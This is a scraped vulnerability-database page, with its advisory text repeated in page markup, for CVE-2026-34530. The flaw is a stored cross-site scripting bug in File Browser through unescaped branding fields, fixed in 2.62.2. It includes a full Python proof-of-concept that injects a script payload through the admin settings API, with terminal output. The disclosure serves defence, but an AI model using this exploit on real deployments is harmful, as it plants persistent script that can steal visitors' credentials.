CVE-2026-34530 — File Browser vulnerable to Stored Cross-site Scripting via text/template brandin

` breaks out of the `` tag and injects arbitrary script into every page load.\n\nAdditionally, when ReCaptcha is enabled, the `ReCaptchaHost` field is used as:\n```html\n<script src=\"[{[.ReCaptchaHost]}]/recaptcha/api.js\"></script>\n```\nThis allows loading arbitrary JavaScript from an admin-chosen origin.\n\nNo `Content-Security-Policy` header is set on the SPA entry point, so there is no CSP mitigation.\n\n\n<br/>\n\n### PoC\nBelow is the PoC python script that could be ran on test environment using docker compose:\n\n```yaml\nservices:\n\n filebrowser:\n image: filebrowser/filebrowser:v2.62.1\n user: 0:0\n ports:\n - \"80:80\"\n```\n\nAnd running this PoC python script:\n```python\nimport argparse\nimport json\nimport sys\nimport requests\n\n\nBANNER = \"\"\"\n Stored XSS via Branding Injection PoC\n Affected: filebrowser/filebrowser <=v2.62.1\n Root cause: http/static.go uses text/template (not html/template)\n Branding fields rendered unescaped into SPA index.html\n\"\"\"\n\nXSS_MARKER = \"XSS_BRANDING_POC_12345\"\nXSS_PAYLOAD = (\n ''\n)\n\n\ndef login(base: str, username: str, password: str) -> str:\n r = requests.post(f\"{base}/api/login\",\n json={\"username\": username, \"password\": password},\n timeout=10)\n if r.status_code != 200:\n print(f\" Login failed: {r.status_code}\")\n sys.exit(1)\n return r.text.strip('\"')\n\n\ndef main():\n sys.stdout.write(BANNER)\n sys.stdout.flush()\n\n ap = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"Stored XSS via branding injection PoC\",\n epilog=\"\"\"examples:\n %(prog)s -t http://localhost -u admin -p admin\n %(prog)s -t http://target.com/filebrowser -u admin -p secret\n\nhow it works:\n 1. Authenticates as admin to File Browser\n 2. Sets branding.name to a <script> payload via PUT /api/settings\n 3. Fetches the SPA index (unauthenticated) to verify the payload\n renders unescaped in the HTML <title> tag\n\nroot cause:\n http/static.go renders the SPA index.html using Go's text/template\n (NOT html/template) with custom delimiters [{[ and ]}].\n Branding fields like Name are inserted directly into HTML:\n <title>[{[.Name]}]\n No escaping is applied, so HTML/JS in the name breaks out of\n the tag and executes as script.\n\nimpact:\n Stored XSS affecting ALL visitors (including unauthenticated).\n An admin (or attacker who compromised admin) can inject persistent\n JavaScript that steals credentials from every user who visits.\"\"\",\n )\n\n ap.add_argument(\"-t\", \"--target\", required=True,\n help=\"Base URL of File Browser (e.g. http://localhost)\")\n ap.add_argument(\"-u\", \"--user\", required=True,\n help=\"Admin username\")\n ap.add_argument(\"-p\", \"--password\", required=True,\n help=\"Admin password\")\n if len(sys.argv) == 1:\n ap.print_help()\n sys.exit(1)\n args = ap.parse_args()\n\n base = args.target.rstrip(\"/\")\n hdrs = lambda tok: {\"X-Auth\": tok, \"Content-Type\": \"application/json\"}\n\n print()\n print(\"[*] ATTACK BEGINS...\")\n print(\"====================\")\n\n print(f\"\\n [1] Authenticating to {base}\")\n token = login(base, args.user, args.password)\n print(f\" Logged in as: {args.user}\")\n\n print(f\"\\n [2] Injecting XSS payload into branding.name\")\n r = requests.get(f\"{base}/api/settings\", headers=hdrs(token), timeout=10)\n if r.status_code != 200:\n print(f\" Failed: GET /api/settings returned {r.status_code}\")\n print(f\" (requires admin privileges)\")\n sys.exit(1)\n settings = r.json()\n settings[\"branding\"][\"name\"] = XSS_PAYLOAD\n r = requests.put(f\"{base}/api/settings\", headers=hdrs(token),\n json=settings, timeout=10)\n if r.status_code != 200:\n print(f\" Failed: PUT /api/settings returned {r.status_code}\")\n sys.exit(1)\n print(f\" Payload injected\")\n\n print(f\"\\n [3] Verifying XSS renders in unauthenticated SPA\")\n r = requests.get(f\"{base}/\", timeout=10)\n html = r.text\n\n if XSS_MARKER in html:\n print(f\" XSS payload found in HTML response!\")\n for line in html.split(\"\\n\"):\n if XSS_MARKER in line:\n print(f\" >>> {line.strip()[:120]}\")\n csp = r.headers.get(\"Content-Security-Policy\", \"\")\n if not csp:\n print(f\" No CSP header — script executes without restriction\")\n confirmed = True\n else:\n print(f\" Payload NOT found in HTML\")\n confirmed = False\n\n print()\n print(\"====================\")\n\n if confirmed:\n print()\n print(\"CONFIRMED: text/template renders branding.name without escaping.\")\n print(\"The <title> tag is broken and arbitrary <script> executes.\")\n print(\"Every visitor (authenticated or not) receives the payload.\")\n print()\n print(f\"Open {base}/ in a browser to see the alert() popup.\")\n else:\n print()\n print(\"NOT CONFIRMED in this test run.\")\n print()\n\n\nif __name__ == \"__main__\":\n main()\n```\n\nAnd terminal output:\n```bash\nroot@server205:~/sec-filebrowser# python3 poc_branding_xss.py -t http://localhost -u admin -p \"jhSR9z9pofv5evlX\"\n\n Stored XSS via Branding Injection PoC\n Affected: filebrowser/filebrowser <=v2.62.1\n Root cause: http/static.go uses text/template (not html/template)\n Branding fields rendered unescaped into SPA index.html\n\n[*] ATTACK BEGINS...\n====================\n\n [1] Authenticating to http://localhost\n Logged in as: admin\n\n [2] Injecting XSS payload into branding.name\n Payload injected\n\n [3] Verifying XSS renders in unauthenticated SPA\n XSS payload found in HTML response!\n >>> \n >>> window.FileBrowser = {\"AuthMethod\":\"json\",\"BaseURL\":\"\",\"CSS\":false,\"Color\":\"\",\"DisableExternal\":false,\"DisableUsedPercen\n No CSP header — script executes without restriction\n\n====================\n\nCONFIRMED: text/template renders branding.name without escaping.\nThe <title> tag is broken and arbitrary <script> executes.\nEvery visitor (authenticated or not) receives the payload.\n\nOpen http://localhost/ in a browser to see the alert() popup.\n\n```\n\n\n<br/>\n\n### Impact\n- Stored XSS affecting ALL visitors including unauthenticated users\n- Persistent backdoor — the payload survives until branding is manually changed","inLanguage":"en","url":"https://vulnscope.dev/en/cve/CVE-2026-34530","author":{"@type":"Organization","name":"VulnScope","url":"https://vulnscope.dev"},"publisher":{"@type":"Organization","name":"VulnScope","url":"https://vulnscope.dev"},"about":{"@type":"Thing","name":"CVE-2026-34530","identifier":"CVE-2026-34530","additionalProperty":[{"@type":"PropertyValue","name":"CVSS","value":6.9},{"@type":"PropertyValue","name":"EPSS","value":0.0003},{"@type":"PropertyValue","name":"KEV","value":false}]}}</script><section class="rounded-lg border border-[hsl(var(--border))] border-l-4 border-l-yellow-500 bg-[hsl(var(--background))] p-5"><div class="flex flex-col gap-4 sm:flex-row sm:items-start sm:justify-between"><div class="min-w-0 flex-1 space-y-2"><h1 class="text-2xl font-bold font-mono break-all">CVE-2026-34530</h1><p class="text-lg leading-snug text-[hsl(var(--foreground))]">File Browser vulnerable to Stored Cross-site Scripting via text/template branding injection</p></div><div class="shrink-0 sm:text-right"><div class="text-5xl font-bold font-mono leading-none text-yellow-600">6.9</div><div class="mt-1 text-xs font-bold uppercase tracking-wide text-yellow-600">MEDIUM</div><div class="mt-0.5 text-[10px] uppercase tracking-wide text-[hsl(var(--muted-foreground))]">CVSS 3.1</div></div></div><div class="mt-4 flex flex-wrap items-center gap-2"><span title="0.03% probability of exploitation in 30 days · top 90.8%" class="inline-flex items-center rounded px-1.5 py-0.5 text-[10px] font-bold uppercase tracking-wide font-mono bg-zinc-200 text-zinc-700 dark:bg-zinc-700 dark:text-zinc-200">EPSS 0.03%</span></div></section><div class="grid gap-6 lg:grid-cols-[1fr_280px]"><main class="min-w-0 space-y-6"><section class="rounded-lg border border-[hsl(var(--border))] bg-[hsl(var(--background))] p-5"><h2 class="text-base font-semibold mb-3">Description</h2><p class="whitespace-pre-wrap leading-relaxed">### Summary The SPA index page in File Browser is vulnerable to Stored Cross-site Scripting (XSS) via admin-controlled branding fields. An admin who sets `branding.name` to a malicious payload injects persistent JavaScript that executes for ALL visitors, including unauthenticated users. <br/> ### Details `http/static.go` renders the SPA `index.html` using Go's `text/template` (NOT `html/template`) with custom delimiters `[{[` and `]}]`. Branding fields are inserted directly into HTML without any escaping: ```go // http/static.go, line 16 — imports text/template instead of html/template "text/template" // http/static.go, line 33 — branding.Name passed into template data "Name": d.settings.Branding.Name, // http/static.go, line 97 — template parsed with custom delimiters, no escaping index := template.Must(template.New("index").Delims("[{[", "]}]").Parse(string(fileContents))) ``` The frontend template (`frontend/public/index.html`) embeds these fields directly: ```html  [{[ if .Name -]}][{[ .Name ]}][{[ else ]}]File Browser[{[ end ]}]  content="[{[ if .Color -]}][{[ .Color ]}][{[ else ]}]#2979ff[{[ end ]}]" ``` Since `text/template` performs NO HTML escaping (unlike `html/template`), setting `branding.name` to `</title><script>alert(1)</script>` breaks out of the `<title>` tag and injects arbitrary script into every page load. Additionally, when ReCaptcha is enabled, the `ReCaptchaHost` field is used as: ```html <script src="[{[.ReCaptchaHost]}]/recaptcha/api.js"></script> ``` This allows loading arbitrary JavaScript from an admin-chosen origin. No `Content-Security-Policy` header is set on the SPA entry point, so there is no CSP mitigation. <br/> ### PoC Below is the PoC python script that could be ran on test environment using docker compose: ```yaml services: filebrowser: image: filebrowser/filebrowser:v2.62.1 user: 0:0 ports: - "80:80" ``` And running this PoC python script: ```python import argparse import json import sys import requests BANNER = """ Stored XSS via Branding Injection PoC Affected: filebrowser/filebrowser <=v2.62.1 Root cause: http/static.go uses text/template (not html/template) Branding fields rendered unescaped into SPA index.html """ XSS_MARKER = "XSS_BRANDING_POC_12345" XSS_PAYLOAD = ( '</title><script>window.' + XSS_MARKER + '=1;' 'alert("XSS in File Browser branding")</script><title>' ) def login(base: str, username: str, password: str) -> str: r = requests.post(f"{base}/api/login", json={"username": username, "password": password}, timeout=10) if r.status_code != 200: print(f" Login failed: {r.status_code}") sys.exit(1) return r.text.strip('"') def main(): sys.stdout.write(BANNER) sys.stdout.flush() ap = argparse.ArgumentParser( formatter_class=argparse.RawDescriptionHelpFormatter, description="Stored XSS via branding injection PoC", epilog="""examples: %(prog)s -t http://localhost -u admin -p admin %(prog)s -t http://target.com/filebrowser -u admin -p secret how it works: 1. Authenticates as admin to File Browser 2. Sets branding.name to a <script> payload via PUT /api/settings 3. Fetches the SPA index (unauthenticated) to verify the payload renders unescaped in the HTML <title> tag root cause: http/static.go renders the SPA index.html using Go's text/template (NOT html/template) with custom delimiters [{[ and ]}]. Branding fields like Name are inserted directly into HTML: <title>[{[.Name]}]</title> No escaping is applied, so HTML/JS in the name breaks out of the <title> tag and executes as script. impact: Stored XSS affecting ALL visitors (including unauthenticated). An admin (or attacker who compromised admin) can inject persistent JavaScript that steals credentials from every user who visits.""", ) ap.add_argument("-t", "--target", required=True, help="Base URL of File Browser (e.g. http://localhost)") ap.add_argument("-u", "--user", required=True, help="Admin username") ap.add_argument("-p", "--password", required=True, help="Admin password") if len(sys.argv) == 1: ap.print_help() sys.exit(1) args = ap.parse_args() base = args.target.rstrip("/") hdrs = lambda tok: {"X-Auth": tok, "Content-Type": "application/json"} print() print("[*] ATTACK BEGINS...") print("====================") print(f"\n [1] Authenticating to {base}") token = login(base, args.user, args.password) print(f" Logged in as: {args.user}") print(f"\n [2] Injecting XSS payload into branding.name") r = requests.get(f"{base}/api/settings", headers=hdrs(token), timeout=10) if r.status_code != 200: print(f" Failed: GET /api/settings returned {r.status_code}") print(f" (requires admin privileges)") sys.exit(1) settings = r.json() settings["branding"]["name"] = XSS_PAYLOAD r = requests.put(f"{base}/api/settings", headers=hdrs(token), json=settings, timeout=10) if r.status_code != 200: print(f" Failed: PUT /api/settings returned {r.status_code}") sys.exit(1) print(f" Payload injected") print(f"\n [3] Verifying XSS renders in unauthenticated SPA") r = requests.get(f"{base}/", timeout=10) html = r.text if XSS_MARKER in html: print(f" XSS payload found in HTML response!") for line in html.split("\n"): if XSS_MARKER in line: print(f" >>> {line.strip()[:120]}") csp = r.headers.get("Content-Security-Policy", "") if not csp: print(f" No CSP header — script executes without restriction") confirmed = True else: print(f" Payload NOT found in HTML") confirmed = False print() print("====================") if confirmed: print() print("CONFIRMED: text/template renders branding.name without escaping.") print("The <title> tag is broken and arbitrary <script> executes.") print("Every visitor (authenticated or not) receives the payload.") print() print(f"Open {base}/ in a browser to see the alert() popup.") else: print() print("NOT CONFIRMED in this test run.") print() if __name__ == "__main__": main() ``` And terminal output: ```bash root@server205:~/sec-filebrowser# python3 poc_branding_xss.py -t http://localhost -u admin -p "jhSR9z9pofv5evlX" Stored XSS via Branding Injection PoC Affected: filebrowser/filebrowser <=v2.62.1 Root cause: http/static.go uses text/template (not html/template) Branding fields rendered unescaped into SPA index.html [*] ATTACK BEGINS... ==================== [1] Authenticating to http://localhost Logged in as: admin [2] Injecting XSS payload into branding.name Payload injected [3] Verifying XSS renders in unauthenticated SPA XSS payload found in HTML response! >>> </title><script>window.XSS_BRANDING_POC_12345=1;alert("XSS in File Browser branding")</script><title> >>> window.FileBrowser = {"AuthMethod":"json","BaseURL":"","CSS":false,"Color":"","DisableExternal":false,"DisableUsedPercen No CSP header — script executes without restriction ==================== CONFIRMED: text/template renders branding.name without escaping. The <title> tag is broken and arbitrary <script> executes. Every visitor (authenticated or not) receives the payload. Open http://localhost/ in a browser to see the alert() popup. ``` <br/> ### Impact - Stored XSS affecting ALL visitors including unauthenticated users - Persistent backdoor — the payload survives until branding is manually changed</p></section><template id="P:4"></template><template id="P:5"></template><template id="P:6"></template><template id="P:7"></template><template id="P:8"></template></main><template id="P:9"></template></div></article></div><script>$RS=function(a,b){a=document.getElementById(a);b=document.getElementById(b);for(a.parentNode.removeChild(a);a.firstChild;)b.parentNode.insertBefore(a.firstChild,b);b.parentNode.removeChild(b)};$RS("S:2","P:2")</script><script>self.__next_f.push([1,"35:[\"$\",\"$L28\",null,{\"ref\":\"$undefined\",\"href\":\"/en/package/Go/github.com/filebrowser/filebrowser/v2\",\"locale\":\"$undefined\",\"localeCookie\":\"$1c:props:localeCookie\",\"className\":\"font-mono no-underline\",\"children\":[[\"$\",\"span\",null,{\"className\":\"text-xs text-[hsl(var(--muted-foreground))]\",\"children\":[\"Go\",\"/\"]}],[\"$\",\"span\",null,{\"children\":\"github.com/filebrowser/filebrowser/v2\"}]]}]\n36:[\"$\",\"$L28\",null,{\"ref\":\"$undefined\",\"href\":\"/en/package/Go/github.com/filebrowser/filebrowser/v2\",\"locale\":\"$undefined\",\"localeCookie\":\"$1c:props:localeCookie\",\"className\":\"no-underline font-medium\",\"children\":[[\"$\",\"span\",null,{\"className\":\"font-mono text-xs text-[hsl(var(--muted-foreground))]\",\"children\":[\"Go\",\"/\"]}],[\"$\",\"span\",null,{\"className\":\"font-mono\",\"children\":\"github.com/filebrowser/filebrowser/v2\"}]]}]\n"])</script><div hidden id="S:4"><section class="rounded-lg border border-[hsl(var(--border))] bg-[hsl(var(--background))] p-5"><h2 class="text-base font-semibold mb-3">How to fix CVE-2026-34530</h2><p class="leading-relaxed mb-3">To remediate CVE-2026-34530, upgrade the affected package to a fixed version below.</p><ul class="space-y-1.5 text-sm"><li class="flex flex-wrap items-baseline gap-2"><a class="font-mono no-underline" href="/en/package/Go/github.com/filebrowser/filebrowser/v2"><span class="text-xs text-[hsl(var(--muted-foreground))]">Go/</span><span>github.com/filebrowser/filebrowser/v2</span></a><span class="text-[hsl(var(--muted-foreground))]">—</span><span>upgrade to 2.62.2 or later</span></li></ul></section></div><script>$RS("S:4","P:4")</script><div hidden id="S:5"><section class="rounded-lg border border-[hsl(var(--border))] bg-[hsl(var(--background))] p-5"><h2 class="text-base font-semibold mb-3">Is CVE-2026-34530 being exploited?</h2><p class="leading-relaxed">Low — EPSS is 0.0%, meaning exploitation activity has not been observed at scale.</p></section></div><script>$RS("S:5","P:5")</script><div hidden id="S:6"><section class="rounded-lg border border-[hsl(var(--border))] bg-[hsl(var(--background))] p-5"><h2 class="text-base font-semibold mb-3">Affected packages (1)</h2><ul class="divide-y divide-[hsl(var(--border))] rounded-lg border border-[hsl(var(--border))]"><li class="flex flex-wrap items-center gap-2 px-4 py-3 hover:bg-[hsl(var(--muted))]"><a class="no-underline font-medium" href="/en/package/Go/github.com/filebrowser/filebrowser/v2"><span class="font-mono text-xs text-[hsl(var(--muted-foreground))]">Go/</span><span class="font-mono">github.com/filebrowser/filebrowser/v2</span></a><span class="flex-1 min-w-0 text-sm text-[hsl(var(--muted-foreground))] font-mono">from 0, < 2.62.2</span><template data-dgst="BAILOUT_TO_CLIENT_SIDE_RENDERING"></template></li></ul></section></div><script>$RS("S:6","P:6")</script><div hidden id="S:7"><section class="rounded-lg border border-[hsl(var(--border))] bg-[hsl(var(--background))] p-5"><h2 class="text-base font-semibold mb-3">CVSS scores</h2><div class="overflow-x-auto"><table class="w-full text-sm"><thead class="text-xs uppercase tracking-wide text-[hsl(var(--muted-foreground))]"><tr><th class="text-left py-2 pr-3 font-medium">Source</th><th class="text-left py-2 pr-3 font-medium">Version</th><th class="text-left py-2 pr-3 font-medium">Severity</th><th class="text-left py-2 font-medium">Vector</th></tr></thead><tbody><tr class="border-t border-[hsl(var(--border))]"><td class="py-2 pr-3 font-mono text-xs">osv</td><td class="py-2 pr-3 font-mono text-xs whitespace-nowrap">CVSS 3.1</td><td class="py-2 pr-3"><span class="inline-flex items-center gap-1 rounded px-1.5 py-0.5 text-[10px] font-bold uppercase tracking-wide bg-yellow-500 text-black">MEDIUM<span class="font-mono opacity-90">6.9</span></span></td><td class="py-2 font-mono text-xs break-all text-[hsl(var(--muted-foreground))]">CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N</td></tr></tbody></table></div></section></div><script>$RS("S:7","P:7")</script><div hidden id="S:8"><section class="rounded-lg border border-[hsl(var(--border))] bg-[hsl(var(--background))] p-5"><h2 class="text-base font-semibold mb-3">References (4)</h2><ul class="divide-y divide-[hsl(var(--border))] rounded-lg border border-[hsl(var(--border))]"><li class="hover:bg-[hsl(var(--muted))]"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-34530" target="_blank" rel="noreferrer noopener" class="flex items-baseline gap-3 px-4 py-2 no-underline" title="https://nvd.nist.gov/vuln/detail/CVE-2026-34530"><span class="w-16 shrink-0 font-mono text-[10px] uppercase text-[hsl(var(--muted-foreground))]">ADVISORY</span><span class="min-w-0 flex-1 truncate text-sm"><span class="font-medium">nvd.nist.gov</span><span class="text-[hsl(var(--muted-foreground))]">/vuln/detail/CVE-2026-34530</span></span></a></li><li class="hover:bg-[hsl(var(--muted))]"><a href="https://github.com/filebrowser/filebrowser" target="_blank" rel="noreferrer noopener" class="flex items-baseline gap-3 px-4 py-2 no-underline" title="https://github.com/filebrowser/filebrowser"><span class="w-16 shrink-0 font-mono text-[10px] uppercase text-[hsl(var(--muted-foreground))]">PATCH</span><span class="min-w-0 flex-1 truncate text-sm"><span class="font-medium">github.com</span><span class="text-[hsl(var(--muted-foreground))]">/filebrowser/filebrowser</span></span></a></li><li class="hover:bg-[hsl(var(--muted))]"><a href="https://github.com/filebrowser/filebrowser/releases/tag/v2.62.2" target="_blank" rel="noreferrer noopener" class="flex items-baseline gap-3 px-4 py-2 no-underline" title="https://github.com/filebrowser/filebrowser/releases/tag/v2.62.2"><span class="w-16 shrink-0 font-mono text-[10px] uppercase text-[hsl(var(--muted-foreground))]">WEB</span><span class="min-w-0 flex-1 truncate text-sm"><span class="font-medium">github.com</span><span class="text-[hsl(var(--muted-foreground))]">/filebrowser/filebrowser/releases/tag/v2.62.2</span></span></a></li><li class="hover:bg-[hsl(var(--muted))]"><a href="https://github.com/filebrowser/filebrowser/security/advisories/GHSA-xfqj-3vmx-63wv" target="_blank" rel="noreferrer noopener" class="flex items-baseline gap-3 px-4 py-2 no-underline" title="https://github.com/filebrowser/filebrowser/security/advisories/GHSA-xfqj-3vmx-63wv"><span class="w-16 shrink-0 font-mono text-[10px] uppercase text-[hsl(var(--muted-foreground))]">WEB</span><span class="min-w-0 flex-1 truncate text-sm"><span class="font-medium">github.com</span><span class="text-[hsl(var(--muted-foreground))]">/filebrowser/filebrowser/security/advisories/GHSA-xfqj-3vmx-63wv</span></span></a></li></ul></section></div><script>$RS("S:8","P:8")</script><div hidden id="S:9"><aside class="space-y-6 lg:sticky lg:top-6 lg:self-start"><section class="rounded-lg border border-[hsl(var(--border))] bg-[hsl(var(--background))] p-5"><h2 class="text-xs font-semibold uppercase tracking-wide text-[hsl(var(--muted-foreground))] mb-3">Metadata</h2><dl class="space-y-2 text-sm"><div class="flex justify-between gap-3"><dt class="text-[hsl(var(--muted-foreground))]">Published</dt><dd class="font-mono text-xs">3/31/2026</dd></div><div class="flex justify-between gap-3"><dt class="text-[hsl(var(--muted-foreground))]">Modified</dt><dd class="font-mono text-xs">4/6/2026</dd></div></dl></section><section class="rounded-lg border border-[hsl(var(--border))] bg-[hsl(var(--background))] p-5"><h2 class="text-xs font-semibold uppercase tracking-wide text-[hsl(var(--muted-foreground))] mb-3">Also known as:</h2><ul class="flex flex-col gap-1.5"><li><a href="https://github.com/advisories/GHSA-xfqj-3vmx-63wv" target="_blank" rel="noreferrer noopener" class="block rounded border border-[hsl(var(--border))] px-2 py-1 no-underline hover:bg-[hsl(var(--muted))]"><span class="flex items-baseline justify-between gap-2"><span class="font-mono text-sm break-all">GHSA-xfqj-3vmx-63wv</span><span class="shrink-0 text-[10px] uppercase tracking-wide text-[hsl(var(--muted-foreground))]">ghsa</span></span></a></li></ul></section></aside></div><script>$RS("S:9","P:9")</script><script>$RC("B:1","S:1")</script></body></html>